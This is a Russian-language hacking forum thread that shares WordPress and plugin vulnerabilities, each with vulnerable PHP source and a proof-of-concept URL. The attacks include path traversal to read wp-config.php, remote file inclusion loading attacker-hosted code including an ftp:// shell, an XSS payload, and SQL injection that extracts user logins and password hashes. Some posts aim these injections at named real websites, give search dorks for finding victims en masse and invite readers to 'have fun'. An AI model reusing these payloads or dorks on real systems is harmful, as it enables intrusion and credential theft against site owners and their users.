Старый 18.12.2010, 10:15   #31
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Old Post Spinner (OPS) 2.15

скачать

Читалка файлов

wp-content/plugins/old-post-spinner/logview.php
PHP код:
$ops_file=urldecode($_GET["ops_file"]);
    
header('Content-type: text/html; charset="utf-8"',true);
     if (@
file_exists($ops_file)) {
        print 
"<pre>";
        foreach (
file($ops_file) as $line) {
            print 
$line;
        }
        print 
"</pre>";
    } else {
        print 
'<br>No logfile until now';
    } 
PoC:
Код:
http://[host]/[path]/wp-content/plugins/old-post-spinner/logview.php?ops_file=../../../wp-config.php
}{оттабыч вне форума   Ответить с цитированием
Старый 19.12.2010, 21:09   #32
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Zingiri Web Shop 1.6.9

скачать

Плагин с wordpress.org скачали 30тыс. раз, обновление 2010-11-28.

RFI

/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php
PHP код:
<?php
//error_reporting(E_ALL & ~E_NOTICE);
//ini_set('display_errors', '1');

if ($_REQUEST['cms']=='jl') {
    
define('ZING_CMS','jl');
    
$_REQUEST['tmpl'] = 'component';
    
$_REQUEST['option'] = 'com_zingiriwebshop';
    
ob_start();
    require(
$_REQUEST['wpabspath'].'/index.php');
    
ob_end_clean();
} elseif (
$_REQUEST['cms']=='dp') {
    
//all bootstrapping is already done
} else {
    
/** Loads the WordPress Environment */
    //require($_REQUEST['wpabspath'].'wp-blog-header.php');
    
require($_REQUEST['wpabspath'].'wp-load.php');
    
/** Load Zingiri Web Shop */
    
require(dirname(__FILE__).'/../../zing.readcookie.inc.php');
    require(
dirname(__FILE__).'/../../startmodules.inc.php');
}
?>
PoC:
Код:
http://[host]/[path]/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=http://[host]/[path]/filename?
}{оттабыч вне форума   Ответить с цитированием
Старый 20.12.2010, 05:38   #33
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

WP-phpMyAdmin

скачать

inurl:wp-content/plugins/wp-phpmyadmin

phpMyAdmin <= 2.11.9 unserialize() arbitrary PHP code execution exploit
}{оттабыч вне форума   Ответить с цитированием
Старый 03.01.2011, 12:24   #34
_xhugo
 
Регистрация: 11.11.2010
Сообщений: 26
Репутация: 0
По умолчанию

WordPress 3.0.4
XSS
Homepage: http://forum.itsecteam.com/showthread.php?p=6520#post6520
Description: Attackers can execute malicious javascript codes or hijacking SESSION for privilege escalation.
Depends: The attacker has to be the authority of the editor.
PoC
Цитата:
'"--></style></script><script>alert('XSS')</script>
_xhugo вне форума   Ответить с цитированием
Старый 16.02.2011, 02:40   #35
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

BackWPup 1.4.1

скачать

Цитата:
Плагин для создания бекапов вашего блога.
Помимо сохранения базы данных и отсылки по e-mail, есть выбор форматов бекапа - zip, tar, tar.gz, tar.bz2.
BackWPup дает возможность оптимизировать и ремонтировать базу данных, а также сохранять данные блога в формате xml.
RFI

/wp-content/plugins/backwpup/app/wp_xml_export.php
PHP код:
<?PHP
if (file_exists($_GET['wpabs'].'wp-load.php')) {
    require_once(
$_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
} else {
    
header("HTTP/1.0 404 Not Found");
}
if (
$_GET['_nonce']==substr(md5(md5(SECURE_AUTH_KEY)),10,10)) {
    require_once(
$_GET['wpabs'].'wp-admin/includes/export.php');
    
export_wp();
} else {
    
header("HTTP/1.0 404 Not Found");
}
?>
PoC
Код:
http://[host]/[path]/wp-content/plugins/backwpup/app/wp_xml_export.php?wpabs=ftp://<user>:<password>@<host>:<port>/shell?
}{оттабыч вне форума   Ответить с цитированием
Старый 20.02.2011, 21:15   #36
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

может кому то попад.

Portable phpMyAdmin

скачать тут

setup.php -> wp-content/plugins/portable-phpmyadmin/wp-pma-mod/scripts/setup.php

phpMyAdmin <= 2.11.9 unserialize() arbitrary PHP code execution exploit
}{оттабыч вне форума   Ответить с цитированием
Старый 05.04.2011, 00:13   #37
z0mbyak
 
Регистрация: 10.11.2010
Сообщений: 21
Репутация: 11
По умолчанию

Доброго времени суток, ковырял тут водпресс и вот что наковырял)

Тип: SQL-Inj

Плагин: Хрен его знает как он называется точно, так как пасс не подобрал) но какой-то фейсбуковский)

Dork: inurl:"fbconnect_action=myhome"

Собственно PoC:

http://www.sociable.es/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--
или
http://binaries.ru/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--

P.S. Вроде не боян, хотя с вордпрессом не работаю, поэтому не в курсе)

P.P.S В Google
Цитата:
Результатов: примерно 926 000
Развлекайтесь)))
z0mbyak вне форума   Ответить с цитированием
Старый 03.07.2011, 17:21   #38
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

Wordpress <= 3.1.3 post-auth SQL-Injection

https://www.sec-consult.com/files/20110621-0_wordpress_multiple_sqli.txt

Уязвимость возможна при наличии у пользователя прав "Editor":
Код:
http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL 
injection]&order=[SQL injection] 
http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL 
injection]&order=[SQL injection] 
http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL 
injection]&order=[SQL injection]
Raz0r вне форума   Ответить с цитированием
Старый 19.01.2012, 22:44   #39
shuba
 
Аватар для shuba
 
Регистрация: 05.07.2010
Сообщений: 104
Репутация: 5
По умолчанию

боян или не боян, но вот

Цитата:
inurl:wp-admin/install.php Требуется информация
Примеры из ПС:
http://gwoo.ru/wp-admin/install.php
http://simbirsku.net/wp-admin/install.php
shuba вне форума   Ответить с цитированием
Старый 29.01.2012, 02:36   #40
tch
 
Аватар для tch
 
Регистрация: 18.09.2011
Сообщений: 9
Репутация: 0
По умолчанию

Читал где-то про install.php,вот только не понял можноли поставить поверху или что другое?
tch вне форума   Ответить с цитированием
Ответ

Метки
auth bypass, уязвимости wordpress, wordpress, wordpress plugin vuln, wordpress vulnerabilities

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot